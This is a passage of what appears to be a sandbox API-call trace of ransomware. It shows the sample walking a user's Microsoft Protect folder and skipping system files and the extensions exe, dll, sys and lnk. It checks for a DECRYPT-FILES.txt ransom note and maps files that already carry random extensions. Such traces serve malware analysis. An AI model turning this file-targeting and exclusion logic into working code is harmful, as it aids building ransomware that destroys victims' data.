lpSrch="\\IETldCache\\") returned 0x0 [0180.775] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\", lpSrch="\\Local Settings\\") returned 0x0 [0180.775] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\", lpSrch="\\AppData\\Local") returned 0x0 [0180.775] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\", lpSrch="AhnLab") returned 0x0 [0180.775] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0180.775] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\") returned 111 [0180.775] lstrlenW (lpString="0a16c9.tmp") returned 10 [0180.775] wsprintfW (in: param_1=0x36fe2f8, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\\\0a16c9.tmp") returned 122 [0180.775] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3388679973-3930757225-3770151564-1000\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x274 [0180.778] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\") returned 111 [0180.778] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0180.778] wsprintfW (in: param_1=0x36fe2f8, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\\\DECRYPT-FILES.txt") returned 129 [0180.778] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3388679973-3930757225-3770151564-1000\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0180.778] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\") returned 111 [0180.778] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\*" [0180.778] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\*", lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x541f1c70, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0xeedfa9c0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xeedfa9c0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x479978 [0180.778] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0180.778] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x541f1c70, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0xeedfa9c0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xeedfa9c0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0180.778] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0180.778] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0180.778] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0xf923e050, ftCreationTime.dwHighDateTime=0x1d3aab9, ftLastAccessTime.dwLowDateTime=0xf923e050, ftLastAccessTime.dwHighDateTime=0x1d3aab9, ftLastWriteTime.dwLowDateTime=0xaae040e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x2dc, dwReserved0=0x0, dwReserved1=0x0, cFileName="02540a10-7eb7-4b20-a8c7-470f8986389c.hLgbCEV", cAlternateFileName="02540A~1.HLG")) returned 1 [0180.778] lstrcmpiW (lpString1="02540a10-7eb7-4b20-a8c7-470f8986389c.hLgbCEV", lpString2="DECRYPT-FILES.txt") returned -1 [0180.778] lstrcmpiW (lpString1="02540a10-7eb7-4b20-a8c7-470f8986389c.hLgbCEV", lpString2="autorun.inf") returned -1 [0180.778] lstrcmpiW (lpString1="02540a10-7eb7-4b20-a8c7-470f8986389c.hLgbCEV", lpString2="boot.ini") returned -1 [0180.778] lstrcmpiW (lpString1="02540a10-7eb7-4b20-a8c7-470f8986389c.hLgbCEV", lpString2="desktop.ini") returned -1 [0180.778] lstrcmpiW (lpString1="02540a10-7eb7-4b20-a8c7-470f8986389c.hLgbCEV", lpString2="ntuser.dat") returned -1 [0180.778] lstrcmpiW (lpString1="02540a10-7eb7-4b20-a8c7-470f8986389c.hLgbCEV", lpString2="iconcache.db") returned -1 [0180.778] lstrcmpiW (lpString1="02540a10-7eb7-4b20-a8c7-470f8986389c.hLgbCEV", lpString2="bootsect.bak") returned -1 [0180.778] lstrcmpiW (lpString1="02540a10-7eb7-4b20-a8c7-470f8986389c.hLgbCEV", lpString2="ntuser.dat.log") returned -1 [0180.778] lstrcmpiW (lpString1="02540a10-7eb7-4b20-a8c7-470f8986389c.hLgbCEV", lpString2="thumbs.db") returned -1 [0180.778] lstrcmpiW (lpString1="02540a10-7eb7-4b20-a8c7-470f8986389c.hLgbCEV", lpString2="Bootfont.bin") returned -1 [0180.778] lstrlenW (lpString="02540a10-7eb7-4b20-a8c7-470f8986389c.hLgbCEV") returned 44 [0180.778] lstrcmpiW (lpString1="hLgbCEV", lpString2="lnk") returned -1 [0180.778] lstrcmpiW (lpString1="hLgbCEV", lpString2="exe") returned 1 [0180.778] lstrcmpiW (lpString1="hLgbCEV", lpString2="sys") returned -1 [0180.779] lstrcmpiW (lpString1="hLgbCEV", lpString2="dll") returned 1 [0180.779] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\") returned 111 [0180.779] lstrlenW (lpString="02540a10-7eb7-4b20-a8c7-470f8986389c.hLgbCEV") returned 44 [0180.779] lstrcpyW (in: lpString1=0x36fe2e8, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\" [0180.779] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\", lpString2="02540a10-7eb7-4b20-a8c7-470f8986389c.hLgbCEV" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\02540a10-7eb7-4b20-a8c7-470f8986389c.hLgbCEV") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\02540a10-7eb7-4b20-a8c7-470f8986389c.hLgbCEV" [0180.779] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0180.779] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\02540a10-7eb7-4b20-a8c7-470f8986389c.hLgbCEV" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3388679973-3930757225-3770151564-1000\\02540a10-7eb7-4b20-a8c7-470f8986389c.hlgbcev"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x27c [0180.780] GetFileSizeEx (in: hFile=0x27c, lpFileSize=0x36fdab0 | out: lpFileSize=0x36fdab0*=732) returned 1 [0180.780] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x280 [0180.780] MapViewOfFile (hFileMappingObject=0x280, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0180.781] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0180.781] CloseHandle (hObject=0x280) returned 1 [0180.781] CloseHandle (hObject=0x27c) returned 1 [0180.781] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0180.781] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xeedfa9c0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xeedfa9c0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xeedfa9c0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="0a16c9.tmp", cAlternateFileName="")) returned 1 [0180.781] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="DECRYPT-FILES.txt") returned -1 [0180.781] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="autorun.inf") returned -1 [0180.781] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="boot.ini") returned -1 [0180.781] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="desktop.ini") returned -1 [0180.781] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat") returned -1 [0180.781] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="iconcache.db") returned -1 [0180.781] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="bootsect.bak") returned -1 [0180.781] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat.log") returned -1 [0180.781] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="thumbs.db") returned -1 [0180.781] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="Bootfont.bin") returned -1 [0180.781] lstrlenW (lpString="0a16c9.tmp") returned 10 [0180.781] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0180.781] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0180.781] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0180.781] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0180.781] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\") returned 111 [0180.781] lstrlenW (lpString="0a16c9.tmp") returned 10 [0180.781] lstrcpyW (in: lpString1=0x36fe2e8, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\" [0180.781] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\", lpString2="0a16c9.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\0a16c9.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\0a16c9.tmp" [0180.782] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0180.782] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3388679973-3930757225-3770151564-1000\\0a16c9.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0180.782] CloseHandle (hObject=0x0) returned 0 [0180.782] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0180.782] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0xdc5ea830, ftCreationTime.dwHighDateTime=0x1d41fce, ftLastAccessTime.dwLowDateTime=0xdc5ea830, ftLastAccessTime.dwHighDateTime=0x1d41fce, ftLastWriteTime.dwLowDateTime=0xaae2a240, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x2dc, dwReserved0=0x0, dwReserved1=0x0, cFileName="0e15476d-d8fe-46ca-8099-ebdcf80f637c.WsWuyFb", cAlternateFileName="0E1547~1.WSW")) returned 1 [0180.782] lstrcmpiW (lpString1="0e15476d-d8fe-46ca-8099-ebdcf80f637c.WsWuyFb", lpString2="DECRYPT-FILES.txt") returned -1 [0180.782] lstrcmpiW (lpString1="0e15476d-d8fe-46ca-8099-ebdcf80f637c.WsWuyFb", lpString2="autorun.inf") returned -1 [0180.782] lstrcmpiW (lpString1="0e15476d-d8fe-46ca-8099-ebdcf80f637c.WsWuyFb", lpString2="boot.ini") returned -1 [0180.782] lstrcmpiW (lpString1="0e15476d-d8fe-46ca-8099-ebdcf80f637c.WsWuyFb", lpString2="desktop.ini") returned -1 [0180.782] lstrcmpiW (lpString1="0e15476d-d8fe-46ca-8099-ebdcf80f637c.WsWuyFb", lpString2="ntuser.dat") returned -1 [0180.782] lstrcmpiW (lpString1="0e15476d-d8fe-46ca-8099-ebdcf80f637c.WsWuyFb", lpString2="iconcache.db") returned -1 [0180.782] lstrcmpiW (lpString1="0e15476d-d8fe-46ca-8099-ebdcf80f637c.WsWuyFb", lpString2="bootsect.bak") returned -1 [0180.782] lstrcmpiW (lpString1="0e15476d-d8fe-46ca-8099-ebdcf80f637c.WsWuyFb", lpString2="ntuser.dat.log") returned -1 [0180.782] lstrcmpiW (lpString1="0e15476d-d8fe-46ca-8099-ebdcf80f637c.WsWuyFb", lpString2="thumbs.db") returned -1 [0180.782] lstrcmpiW (lpString1="0e15476d-d8fe-46ca-8099-ebdcf80f637c.WsWuyFb", lpString2="Bootfont.bin") returned -1 [0180.782] lstrlenW (lpString="0e15476d-d8fe-46ca-8099-ebdcf80f637c.WsWuyFb") returned 44 [0180.782] lstrcmpiW (lpString1="WsWuyFb", lpString2="lnk") returned 1 [0180.782] lstrcmpiW (lpString1="WsWuyFb", lpString2="exe") returned 1 [0180.782] lstrcmpiW (lpString1="WsWuyFb", lpString2="sys") returned 1 [0180.782] lstrcmpiW (lpString1="WsWuyFb", lpString2="dll") returned 1 [0180.783] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\") returned 111 [0180.783] lstrlenW (lpString="0e15476d-d8fe-46ca-8099-ebdcf80f637c.WsWuyFb") returned 44 [0180.783] lstrcpyW (in: lpString1=0x36fe2e8, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\" [0180.783] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\", lpString2="0e15476d-d8fe-46ca-8099-ebdcf80f637c.WsWuyFb" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\0e15476d-d8fe-46ca-8099-ebdcf80f637c.WsWuyFb") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\0e15476d-d8fe-46ca-8099-ebdcf80f637c.WsWuyFb" [0180.783] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0180.783] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\0e15476d-d8fe-46ca-8099-ebdcf80f637c.WsWuyFb" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3388679973-3930757225-3770151564-1000\\0e15476d-d8fe-46ca-8099-ebdcf80f637c.wswuyfb"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x27c [0180.784] GetFileSizeEx (in: hFile=0x27c, lpFileSize=0x36fdab0 | out: lpFileSize=0x36fdab0*=732) returned 1 [0180.784] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x280 [0180.784] MapViewOfFile (hFileMappingObject=0x280, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0180.785] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0180.785] CloseHandle (hObject=0x280) returned 1 [0180.785] CloseHandle (hObject=0x27c) returned 1 [0180.785] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0180.785] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0xf6409280, ftCreationTime.dwHighDateTime=0x1d4ae2c, ftLastAccessTime.dwLowDateTime=0xf6409280, ftLastAccessTime.dwHighDateTime=0x1d4ae2c, ftLastWriteTime.dwLowDateTime=0xaae76500, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x2dc, dwReserved0=0x0, dwReserved1=0x0, cFileName="102a7bc8-3f85-4bb4-840a-38257d2965d2.TqgX4", cAlternateFileName="102A7B~1.TQG")) returned 1 [0180.785] lstrcmpiW (lpString1="102a7bc8-3f85-4bb4-840a-38257d2965d2.TqgX4", lpString2="DECRYPT-FILES.txt") returned -1 [0180.785] lstrcmpiW (lpString1="102a7bc8-3f85-4bb4-840a-38257d2965d2.TqgX4", lpString2="autorun.inf") returned -1 [0180.785] lstrcmpiW (lpString1="102a7bc8-3f85-4bb4-840a-38257d2965d2.TqgX4", lpString2="boot.ini") returned -1 [0180.785] lstrcmpiW (lpString1="102a7bc8-3f85-4bb4-840a-38257d2965d2.TqgX4", lpString2="desktop.ini") returned -1 [0180.785] lstrcmpiW (lpString1="102a7bc8-3f85-4bb4-840a-38257d2965d2.TqgX4", lpString2="ntuser.dat") returned -1 [0180.785] lstrcmpiW (lpString1="102a7bc8-3f85-4bb4-840a-38257d2965d2.TqgX4", lpString2="iconcache.db") returned -1 [0180.785] lstrcmpiW (lpString1="102a7bc8-3f85-4bb4-840a-38257d2965d2.TqgX4", lpString2="bootsect.bak") returned -1 [0180.785] lstrcmpiW (lpString1="102a7bc8-3f85-4bb4-840a-38257d2965d2.TqgX4", lpString2="ntuser.dat.log") returned -1 [0180.785] lstrcmpiW (lpString1="102a7bc8-3f85-4bb4-840a-38257d2965d2.TqgX4", lpString2="thumbs.db") returned -1 [0180.785] lstrcmpiW (lpString1="102a7bc8-3f85-4bb4-840a-38257d2965d2.TqgX4", lpString2="Bootfont.bin") returned -1 [0180.785] lstrlenW (lpString="102a7bc8-3f85-4bb4-840a-38257d2965d2.TqgX4") returned 42 [0180.785] lstrcmpiW (lpString1="TqgX4", lpString2="lnk") returned 1 [0180.785] lstrcmpiW (lpString1="TqgX4", lpString2="exe") returned 1 [0180.785] lstrcmpiW (lpString1="TqgX4", lpString2="sys") returned 1 [0180.785] lstrcmpiW (lpString1="TqgX4", lpString2="dll") returned 1 [0180.785] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\") returned 111 [0180.785] lstrlenW (lpString="102a7bc8-3f85-4bb4-840a-38257d2965d2.TqgX4") returned 42 [0180.785] lstrcpyW (in: lpString1=0x36fe2e8, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\" [0180.786] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\", lpString2="102a7bc8-3f85-4bb4-840a-38257d2965d2.TqgX4" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\102a7bc8-3f85-4bb4-840a-38257d2965d2.TqgX4") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\102a7bc8-3f85-4bb4-840a-38257d2965d2.TqgX4" [0180.786] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0180.786] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\102a7bc8-3f85-4bb4-840a-38257d2965d2.TqgX4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3388679973-3930757225-3770151564-1000\\102a7bc8-3f85-4bb4-840a-38257d2965d2.tqgx4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x27c [0180.786] GetFileSizeEx (in: hFile=0x27c, lpFileSize=0x36fdab0 | out: lpFileSize=0x36fdab0*=732) returned 1 [0180.786] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x280 [0180.786] MapViewOfFile (hFileMappingObject=0x280, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0180.787] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0180.787] CloseHandle (hObject=0x280) returned 1 [0180.787] CloseHandle (hObject=0x27c) returned 1 [0180.787] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0180.787] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x542b0350, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x542b0350, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xaae9c660, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x2dc, dwReserved0=0x0, dwReserved1=0x0, cFileName="2be989a0-16a1-424b-9211-51aa3bb43e5d.JR60f", cAlternateFileName="2BE989~1.JR6")) returned 1 [0180.787] lstrcmpiW (lpString1="2be989a0-16a1-424b-9211-51aa3bb43e5d.JR60f", lpString2="DECRYPT-FILES.txt") returned -1 [0180.787] lstrcmpiW (lpString1="2be989a0-16a1-424b-9211-51aa3bb43e5d.JR60f", lpString2="autorun.inf") returned -1 [0180.788] lstrcmpiW (lpString1="2be989a0-16a1-424b-9211-51aa3bb43e5d.JR60f", lpString2="boot.ini") returned -1 [0180.788] lstrcmpiW (lpString1="2be989a0-16a1-424b-9211-51aa3bb43e5d.JR60f", lpString2="desktop.ini") returned -1 [0180.788] lstrcmpiW (lpString1="2be989a0-16a1-424b-9211-51aa3bb43e5d.JR60f", lpString2="ntuser.dat") returned -1 [0180.788] lstrcmpiW (lpString1="2be989a0-16a1-424b-9211-51aa3bb43e5d.JR60f", lpString2="iconcache.db") returned -1 [0180.788] lstrcmpiW (lpString1="2be989a0-16a1-424b-9211-51aa3bb43e5d.JR60f", lpString2="bootsect.bak") returned -1 [0180.788] lstrcmpiW (lpString1="2be989a0-16a1-424b-9211-51aa3bb43e5d.JR60f", lpString2="ntuser.dat.log") returned -1 [0180.788] lstrcmpiW (lpString1="2be989a0-16a1-424b-9211-51aa3bb43e5d.JR60f", lpString2="thumbs.db") returned -1 [0180.788] lstrcmpiW (lpString1="2be989a0-16a1-424b-9211-51aa3bb43e5d.JR60f", lpString2="Bootfont.bin") returned -1 [0180.788] lstrlenW (lpString="2be989a0-16a1-424b-9211-51aa3bb43e5d.JR60f") returned 42 [0180.788] lstrcmpiW (lpString1="JR60f", lpString2="lnk") returned -1 [0180.788] lstrcmpiW (lpString1="JR60f", lpString2="exe") returned 1 [0180.788] lstrcmpiW (lpString1="JR60f", lpString2="sys") returned -1 [0180.788] lstrcmpiW (lpString1="JR60f", lpString2="dll") returned 1 [0180.788] lstrlenW 